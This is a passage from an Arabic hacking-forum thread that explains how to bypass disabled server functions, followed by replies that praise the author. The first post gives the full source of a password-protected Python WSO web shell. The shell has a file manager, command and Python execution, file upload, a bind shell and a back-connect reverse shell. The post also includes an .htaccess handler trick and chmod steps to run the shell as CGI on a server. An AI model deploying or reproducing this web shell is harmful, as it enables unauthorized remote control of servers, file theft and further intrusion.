    الحمد لله كما في الصورة اعلاه استطعنا قرائة كل شي و التحكم ب شكل طبيعي
    الان ناتي ل الطريقة الثانية و هي ب غير شل
    مثلآ شل بايثون انا خليت امتدادة sh ورفع هاتكس و تم التخطي ب نجاح ايضآ
    هذا الشل البايثون
    )6:"
    يكون امتداده ب هذي الصورة Wso.sh
    باسوورد الدخول الى الشل
    Mokhalad_HaXor

    :ُeُeW:

    كود PHP:
    #!/usr/bin/env pythonimport sys, os, cgi, commands, time, Cookie, socketfrom stat import *from datetime import datetimesys.stderr = open(os.devnull, 'w')
    password "28a8351105bc24af7d8d49687e78e92f"version "0.1 [py]"

    def getall(theformnolist False):    data = {}    for field in theform.keys():        if type(theform[field]) ==  type([]):            if not nolist:                data[field] = theform.getlist(field)            else:                data[field] = theform.getfirst(field)        elif theform[field].filename:            _FILES[field] = theform[field]        else:            data[field] = theform[field].value    return data
    def escape
    (str):    return str.replace("'""\\'").replace("\r""\\r").replace("\n""\\n")
    _FILES = {}_REQUEST getallcgi.FieldStorage() )if _REQUEST.has_key('charset') == False:    _REQUEST['charset'] = "Windows-1251"if _REQUEST.has_key('a') == False:    _REQUEST['a'] = "files"if _REQUEST.has_key('c') == False:    _REQUEST['c'] = os.getcwd()if _REQUEST.has_key('p1') == False:    _REQUEST['p1'] = ""if _REQUEST.has_key('p2') == False:    _REQUEST['p2'] = ""if _REQUEST.has_key('p3') == False:    _REQUEST['p3'] = ""
    _COOKIE Cookie.SimpleCookie()try:    _COOKIE.load(os.environ["HTTP_COOKIE"])except:    pass
    def printLogin
    ():    _COOKIE['psswd'] = "";    print _COOKIE;    print "Content-type: text/html\n";    print """<center><form method=post>Password: <input type=password name=psswd><input type=submit value='&gt;&gt;'></form></center>"""    exit()
    if 
    _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > :    if _COOKIE['psswd'].value != password:        printLogin()elif _REQUEST.has_key('psswd'):        try:            import hashlib            psswd hashlib.md5()        except:            import md5            psswd md5.new()        psswd.update(_REQUEST['psswd'])        if psswd.hexdigest() != password:            printLogin()        else:            _COOKIE['psswd'] = psswd.hexdigest()else:    printLogin()
    print 
    _COOKIEhome_dir os.getcwd()
    try:    
    os.chdir(_REQUEST['c'])except os.errormsg:    pass
    cwd 
    os.getcwd();if cwd[-1] != '/':    cwd += '/'
    def printHeader():    print "Content-type: text/html\n";    print "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" _REQUEST['charset'] + "'><title>" os.environ["SERVER_NAME"] + " - WSO " version """</title>    <style>        body{background-color:#444;color:#e1e1e1;}        body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }        table.info{ color:#fff;background-color:#222; }        span,h1,a{ color:#df5 !important; }        span{ font-weight: bolder; }        h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }        div.content{ padding: 5px;margin-left:5px;background-color:#333; }        a{ text-decoration:none; }        a:hover{ text-decoration:underline; }        .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }        .bigarea{ width:100%;height:250px; }        input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,"Courier New"; }        form{ margin:0px; }        #toolsTbl{ text-align:center; }        .toolsInp{ width: 300px }        .main th{text-align:left;background-color:#5e5e5e;}        .main tr:hover{background-color:#5e5e5e}        .l1{background-color:#444}        pre,.m{font-family:Courier,Monospace;}    </style>    <script>        var c_ = '""" escape(_REQUEST['c']) + """';        var a_ = '""" escape(_REQUEST['a']) + """';        var p1_ = '""" escape(_REQUEST['p1']) + """';        var p2_ = '""" escape(_REQUEST['p2']) + """';        var p3_ = '""" escape(_REQUEST['p3']) + """';        var charset_ = '""" escape_REQUEST['charset'] ) + """';        function g(a,c,p1,p2,p3,charset) {            if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;            if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;            if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;            if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;            if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;            if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;            document.mf.submit();        }    </script>    <head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">    <form method=post name=mf style='display:none;'>    <input type=hidden name=a>    <input type=hidden name=c>    <input type=hidden name=p1>    <input type=hidden name=p2>    <input type=hidden name=p3>    <input type=hidden name=charset>    </form>"""    print '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Time:<br>Cwd:</span></td>'    print '<td><nobr>'    for x in os.uname():        sys.stdout.write(x+' ')    t = time.localtime()    print '</nobr><br>%s<br>%d-%.2d-%.2d %.2d:%.2d:%.2d <span>Server IP:</span> %s <span>Client IP:</span> %s<br>' %( commands.getoutput( 'id' ), t[0], t[1], t[2], t[3], t[4], t[5], os.environ['SERVER_ADDR'], os.environ['REMOTE_ADDR'])    path = ''    paths = cwd.split('/')    paths.pop()    for x in paths:        path += x + '/'        sys.stdout.write("""<a href="#" onclick="g('files','"""+escape(path)+"""', '', '', '')">"""+x+"""/</a>""")    print " " + permsColor(cwd),"""<a href='#' onclick="g('files','"""+ escape( home_dir ) +"""', '', '', '')">[ home ]</a>"""    charsets = ['UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866']    print '<td width=1 align=right><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'    for charset in charsets:        sys.stdout.write('<option value="%s" ' % charset)        if _REQUEST['charset'] == charset:             sys.stdout.write('selected')        sys.stdout.write('>%s</option>' % charset)    print '</optgroup></select><br></td></tr></table><table style="border-top:2px solid #333;text-align: center;" cellpadding=3 cellspacing=0 width=100%><tr>'    for x in ['Files', 'Console', 'Python', 'Network']:        print "<td width='100px'>[ <a href='#' onclick='g(\""+x.lower()+'", null, "", "", "")\'>'+x+'</a> ]</td>'    print '<td></td></tr></table><div style="margin:5">'
    def printFooter():    if os.access (cwdos.W_OK):        writable "<font color=green>[ Writeable ]</font>"    else:        writable "<font color=red>[ Not writable ]</font>"    print """</div><table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style="border-top:2px solid #333;border-bottom:2px solid #333;">    <tr>        <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value='""" + cwd + """'><input type=submit value="&gt;&gt;"></form></td>        <td><form onsubmit="g('fileTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value="&gt;&gt;"></form></td>    </tr>    <tr>        <td><form onsubmit="g('files',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>        <td><form onsubmit="g('fileTools',null,this.f.value,'save','');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>    </tr>    <tr>        <td><form onsubmit="g('console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value="&gt;&gt;"></form></td>        <td><form method='post' ENCTYPE='multipart/form-data'>        <input type=hidden name=a value='files'>        <input type=hidden name=c value='"""+cwd+"""'>        <input type=hidden name=p1 value='uploadFile'>        <input type=hidden name=charset value='"""+_REQUEST['charset']+"""'>        <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>    </tr>
    </table></div></body></html>"""
    def viewSize(s):    if s >= 1073741824:        return "
    %1.2f  GB" % (s / 1073741824.0);    elif s >= 1048576:        return "%1.2f  MB" % (s / 1048576.0);    elif s >= 1024:        return "%1.2f  KB" % (s / 1024.0);    else:        return str(s) + ' B';
    def perms(p):    mode = os.lstat(p)[ST_MODE]    p = mode    i="";    if (p & 0xC000) == 0xC000:        i = 's'    elif (p & 0xA000) == 0xA000:        i = 'l'    elif (p & 0x8000) == 0x8000:        i = '-'    elif (p & 0x6000) == 0x6000:        i = 'b'    elif (p & 0x4000) == 0x4000:        i = 'd'    elif (p & 0x2000) == 0x2000:        i = 'c'    elif (p & 0x1000) == 0x1000:        i = 'p'    else:        i = 'u'    if p & 0x0100: i += 'r'    else: i += '-'    if p & 0x0080: i += 'w'    else: i += '-'    if  p & 0x0040:        if p & 0x0800: i += 's'        else: i += 'x'    else:        if p & 0x0800: i += 'S'        else: i+='-'    if p & 0x0020: i += 'r'    else: i += '-'    if p & 0x0010: i += 'w'    else: i += '-'    if  p & 0x0008:        if p & 0x0400: i += 's'        else: i += 'x'    else:        if p & 0x0400: i += 'S'        else: i += '-'    if p & 0x0004: i += 'r'    else: i += '-'    if p & 0x0002: i += 'w'    else: i += '-'    if  p & 0x0001:        if p & 0x0200: i += 't'        else: i += 'x'    else:        if p & 0x0200: i += 'T'        else: i += '-'
        return i;
    def permsColor(path):    if not os.access (path, os.R_OK):        return "
    <font color='#FF0000'>"+perms(path)+"</font>"    elif os.access (path, os.W_OK):        return "<font color='#00BB00'>"+perms(path)+"</font>"    else:        return "<font color='white'>"+perms(path)+"</font>"
    def actionConsole():    printHeader()    print "
    <h1>Console</h1><div class=content>"    print """<form name="cf" onSubmit="g(null, null, this.cmd.value);return false;" style="border:1px solid #df5;background-color:#555;"><textarea class=bigarea style="border:0px;" readonly>"""    if len(_REQUEST['p1']) > 0:        print '$', cgi.escape(_REQUEST['p1'])        print cgi.escape(commands.getoutput(_REQUEST['p1']))
        print '</textarea><table cellpadding=0 cellspacing=0 width="
    100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;"></td></tr></table>'    print "</form></div><script>document.cf.cmd.focus();</script>"    printFooter()
    def actionFiles():    printHeader()    if _REQUEST['p1'] == 'uploadFile':        try:            if _FILES['f'].filename:                fn = os.path.basename(_FILES['f'].filename)                open(fn, 'wb').write(_FILES['f'].file.read())        except: pass    if _REQUEST['p1'] == 'mkdir':        try: os.mkdir(_REQUEST['p2'])        except: pass    print "<h1>File manager</h1><div class=content>"    item_stat = os.lstat('..')
        def dirItemInfo(name, item_stat):        if S_ISLNK(item_stat[ST_MODE]):            type = "link"        else:            type = "dir"        tmp = {                'name'  : name,                'path'  : os.path.join(cwd, name),                'size'  : viewSize(item_stat[ST_SIZE]),                'mtime' : datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S"),                'uid'   : str(item_stat[ST_UID]),                'gid'   : str(item_stat[ST_GID]),                'perms' : permsColor(name),                'type'  : type              }        return tmp    dirs = [dirItemInfo('..', os.lstat('..'))]    files = []
        for item in os.listdir(cwd):        item_stat = os.lstat(item)        mode = item_stat[ST_MODE]        tmp = dirItemInfo(item, item_stat)        if S_ISLNK(mode) or S_ISDIR(mode):            dirs.append(tmp)        elif S_ISREG(mode):            files.append(tmp)
        print "<table width='100%' class='main' cellspacing='0' cellpadding='2'><form method='post'>"    print """<tr><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>""";        def sort(a, b):        return cmp(a['name'].lower(), b['name'].lower())
        line = 0    for item in sorted(dirs, sort):        print "<tr"        if line:            print " class=l1"        print "><td><a href='#' onclick='g(null,\""+escape(item['path'])+"\")'><b>[ "+cgi.escape(item['name'])+" ]</b></a></td><td>"+item['type']+"</td><td>"+item['mtime']+"</td><td>"+item['uid']+"/"+item['gid']+"</td><td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'chmod')\">"+item['perms']+"</a></td>"        print "<td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'rename')\">R</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'touch')\">T</a></td></tr>"        line = (line + 1)%2    for item in sorted(files, sort):        print "<tr"        if line:            print " class=l1"        print "><td><a href='#' onclick='g(\"fileTools\",null,\""+escape(item['name'])+"\")'>"+cgi.escape(item['name'])+"</a></td><td>"+item['size']+"</td><td>"+item['mtime']+"</td><td>"+item['uid']+"/"+item['gid']+"</td><td><a href=# onclick=\"g('fileTools', null, '"+escape(item['path'])+"', 'chmod')\">"+item['perms']+"</a></td>"        print "<td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'rename')\">R</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'touch')\">T</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'edit')\">E</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'download')\">D</a></td></tr>"        line = (line + 1)%2
        print "</form></table></div>"    printFooter()
    def actionFileTools():    if _REQUEST['p2'] == "":        _REQUEST['p2'] = "view"    if _REQUEST['p2'] == "download":        print "Content-Disposition: attachment; filename=" + os.path.basename(_REQUEST['p1']) + "\n"        try:            fp = open(_REQUEST['p1'], 'rb')            for x in fp.readlines():                sys.stdout.write(x)            fp.close()        except: pass        return    if _REQUEST['p2'] == "save":        try:            fp = open(_REQUEST['p1'], 'w')            fp.write(_REQUEST['p3'])            fp.close()        except: pass        _REQUEST['p2'] = 'edit'    printHeader()    print "<h1>File tools</h1><div class=content>"    item_stat = os.stat(_REQUEST['p1'])    print "<span>File: </span>" + os.path.basename(_REQUEST['p1']) + " <span>Size: </span> " +viewSize(item_stat[ST_SIZE]) + " <span>Permission:</span> " +permsColor(_REQUEST['p1'])    print "<br/>"    if S_ISDIR(item_stat[ST_MODE]):        menu = ['Chmod', 'Rename', 'Touch']    else:        menu = ['View', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch']    for x in menu:        print "<a href=# onclick=\"g(null, null, null, '"+x.lower()+"')\">"        if x.lower() == _REQUEST['p2']:            print "<b>[ " + x + " ]</b>"        else:            print x        print "</a> "    print "<br><br>";    if _REQUEST['p2'] == "view":        try:            fp = open(_REQUEST['p1'], 'r')            print "<pre class=ml1>"            for x in fp.readlines():                sys.stdout.write(cgi.escape(x))            fp.close()            print "</pre>"        except:            print "Can't open file! "+_REQUEST['p1']    if _REQUEST['p2'] == "edit":        try:            fp = open(_REQUEST['p1'], 'r')            print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'save', this.f.value);return false;\"><textarea name=f class=bigarea>"            for x in fp.readlines():                sys.stdout.write(cgi.escape(x))            fp.close()            print "</textarea><input type='submit' value='&gt;&gt;'></form>"        except:            print "Can't open (create) file! "+_REQUEST['p1']    if _REQUEST['p2'] == "chmod":        import stat, string        if len(_REQUEST['p3']):            perm = string.atoi(_REQUEST['p3'], 8)            try:                os.chmod(_REQUEST['p1'], perm)                print "Done"            except: print "Fail!"        print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'chmod', this.p.value);return false;\"><input type='text' name='p' value='"        print "%o" % stat.S_IMODE(os.stat(_REQUEST['p1'])[ST_MODE])        print "'/><input type='submit' value='&gt;&gt;'></form>"    if _REQUEST['p2'] == "rename":        if len(_REQUEST['p3']):            try:                os.rename(_REQUEST['p1'], _REQUEST['p3'])                _REQUEST['p1'] = _REQUEST['p3']                print "Done<script>p2_='" + escape(_REQUEST['p3']) + "'</script>"            except: print "Fail!"        print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'rename', this.n.value);return false;\"><input type='text' name='n' value='" + escape(_REQUEST['p1'])+ "'/><input type='submit' value='&gt;&gt;'></form>"
        if _REQUEST['p2'] == "touch":        if len(_REQUEST['p3']):            try:                tmstmp = time.mktime(time.strptime(_REQUEST['p3'], "%Y-%m-%d %H:%M:%S"))                os.utime(_REQUEST['p1'], (tmstmp, tmstmp))                item_stat = os.stat(_REQUEST['p1'])                print "Done"            except: print "Fail!"        print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'touch', this.n.value);return false;\"><input type='text' name='n' value='"        print datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S")        print "'/><input type='submit' value='&gt;&gt;'></form>"
        print "</div>"    printFooter()
    def actionPython():    printHeader()    print "<h1>Exec python code</h1><div class=content>"    print """<form name="cf" onSubmit="g(null, null, this.c.value);return false;"><textarea class=bigarea name=c>"""    print '</textarea><input type=submit value="&gt;&gt;">'    if len(_REQUEST['p1']) > 0:        print '<pre class="ml1" style="margin-top:5px;">'        try:            import StringIO            old_stdout = sys.stdout            sys.stdout = StringIO.StringIO()            exec(_REQUEST['p1'])            data = sys.stdout.getvalue()            sys.stdout = old_stdout            print cgi.escape(data)        except:            pass        print '</pre>'    print "</form></div>"    printFooter()
    def actionNetwork():    printHeader()    print """<h1>Network tools</h1><div class=content>    <form name='nfp' onSubmit="g(null,null,'bp',this.port.value);return false;">    <span>Bind port to /bin/sh</span><br/>    Port: <input type='text' name='port' value='31337'><input type=submit value=">>">    </form>    <form name='nfp' onSubmit="g(null,null,'bc',this.server.value,this.port.value);return false;">    <span>Back-connect to</span><br/>    Server: <input type='text' name='server' value='"""+os.environ['REMOTE_ADDR']+"""'> Port: <input type='text' name='port' value='31337'><input type=submit value=">>">    </form><br>"""    if _REQUEST['p1'] != "":        sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)        sock.settimeout(10)    if _REQUEST['p1'] == "bp":        try:            sock.bind(('localhost', int(_REQUEST['p2'])))            sock.listen(0)        except:            print "error"        else:            print "done"        if os.fork()!=0:            (c,addr)=sock.accept()            os.dup2(c.fileno(), 0)            os.dup2(c.fileno(), 1)            os.dup2(c.fileno(), 2)            os.system('/bin/sh -i')            c.shutdown(2)            sock.shutdown(2)    elif _REQUEST['p1'] == "bc":        try:            sock.connect( (_REQUEST['p2'], int(_REQUEST['p3'])) )        except:            print "error"        else:            print "done"            if os.fork()!=0:                os.dup2(sock.fileno(), 0)                os.dup2(sock.fileno(), 1)                os.dup2(sock.fileno(), 2)                os.system('/bin/sh -i')                sock.shutdown(2)    print "</div>"    printFooter()

    try:    {        'files' : actionFiles,        'fileTools' : actionFileTools,        'console' : actionConsole,        'python' : actionPython,        'network' : actionNetwork    }[_REQUEST['a']]()except KeyError:    printHeader()    printFooter()

    و راح نحتاج هاتكس ل تشغيل هذا الشل ب هذا الامتداد
    {3$0}

    [​IMG]
    كود PHP:
    AddType application/x-httpd-cgi .shAddHandler mod_python .shAddHandler mod_perl .shAddHandler cgi-script .sh
    [​IMG]
    تمام التمام ارفع الشل + الهاتكس ب مجلد واحد و قم ب تصريح الشل ك التالي
    {2$0} {2$0} {2$0}

    chmod 755 Wso.sh
    pir+_"te2

    [​IMG]

    و نقوم ب استعراضة في المتصفح و سوف يقوم ب تخطي ايضآ و التحكم ب صورة طبيعية جدآ
    :{2}:​
    ل تحميل الصور + الادوات
    [​IMG]


    ل الاسف وصلنا ل نهاية الموضوع انشاء الله عجبكم الشرح :ُeُeW:​
    ل اي استفسار الردود موجودة انا ب الخدمة
    {3$0} )6:"

    [​IMG]
    الموضوع اهداء لـ

    pir+_"te2​

    و الى كل اعضاء و زوار المنتدى الحبيب

    [​IMG]

    ً#ٌ5oًًًُ. ً#ٌ5oًًًُ. ً#ٌ5oًًًُ. ً#ٌ5oًًًُ.​
    [​IMG]
    [​IMG]
     
    2 شخص معجب بهذا.
  2. нєαяτ

    нєαяτ Developer

    الأنتساب:
    ‏7 مايو 2012
    المشاركات:
    65
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    اسبانيا
    رد: تخطي جميع الدوال الممنوعة بطريقتان قوية (Not writable)

    بارك الله فيك يا اخى الكريم الى الامام دائما يا بطل
     
  3. нєαяτ

    нєαяτ Developer

    الأنتساب:
    ‏7 مايو 2012
    المشاركات:
    65
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    اسبانيا
    رد: تخطي جميع الدوال الممنوعة بطريقتان قوية (Not writable)

    ماذا تعتقد في مشاركة Mokhalad HaXor؟يعجبني ويستحق التقييم
     
  4. H̷e̷l̷l̷ N̷i̷g̷h̷t̷

    H̷e̷l̷l̷ N̷i̷g̷h̷t̷ Developer

    الأنتساب:
    ‏27 أغسطس 2012
    المشاركات:
    47
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    JoRdAn
    رد: تخطي جميع الدوال الممنوعة بطريقتان قوية (Not writable)

    عاشت أيديك ي فنان ^ً#ٌ5oًًًُ.^ وكل سنة وانت طيب ^ً#ٌ5oًًًُ.^
     
  5. H4RUN

    H4RUN DeveloPer Plus

    الأنتساب:
    ‏23 فبراير 2013
    المشاركات:
    164
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    الإقامة:
    H4CKER
    رد: تخطي جميع الدوال الممنوعة بطريقتان قوية (Not writable)

    بارك الله فيك اخي على الشرح الجميل
     
  6. (( السفاح ))

    (( السفاح )) سيد الساحة V • I • P

    الأنتساب:
    ‏11 يوليو 2014
    المشاركات:
    2,531
    الإعجابات المتلقاة:
    2,526
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    رد: تخطي جميع الدوال الممنوعة بطريقتان قوية (Not writable)

    بارك الله بك ياطيب على ماتقدمه من مجهود مميز
     
  7. Elite Trojan

    Elite Trojan Developer

    الأنتساب:
    ‏20 ابريل 2012
    المشاركات:
    68
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    رد: تخطي جميع الدوال الممنوعة بطريقتان قوية (Not writable)

    مشكور الى الطرح المميز
     
  8. ɒfα яσσнy

    ɒfα яσσнy Developer

    الأنتساب:
    ‏28 يناير 2012
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    المليليح
    رد: تخطي جميع الدوال الممنوعة بطريقتان قوية (Not writable)

    الله يعطييك العآآفيية آخ ـوي ,
     
  9. مصطفى الموسوي

    مصطفى الموسوي مشرف أختبار الأختراق مشرف

    الأنتساب:
    ‏5 ديسمبر 2014
    المشاركات:
    438
    الإعجابات المتلقاة:
    787
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    دولة امير المؤمنين
    رد: تخطي جميع الدوال الممنوعة بطريقتان قوية (Not writable)

    استمر خويه:{1}:
     
  10. AnonYmous-IQ

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات مشرف

    الأنتساب:
    ‏31 أغسطس 2014
    المشاركات:
    387
    الإعجابات المتلقاة:
    457
    نقاط الجائزة:
    63
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:
    Iraq
    رد: تخطي جميع الدوال الممنوعة بطريقتان قوية (Not writable)

    [​IMG] عشت حبيبي مخلد دومك مبدع :{1}:​
     

مشاركة هذه الصفحة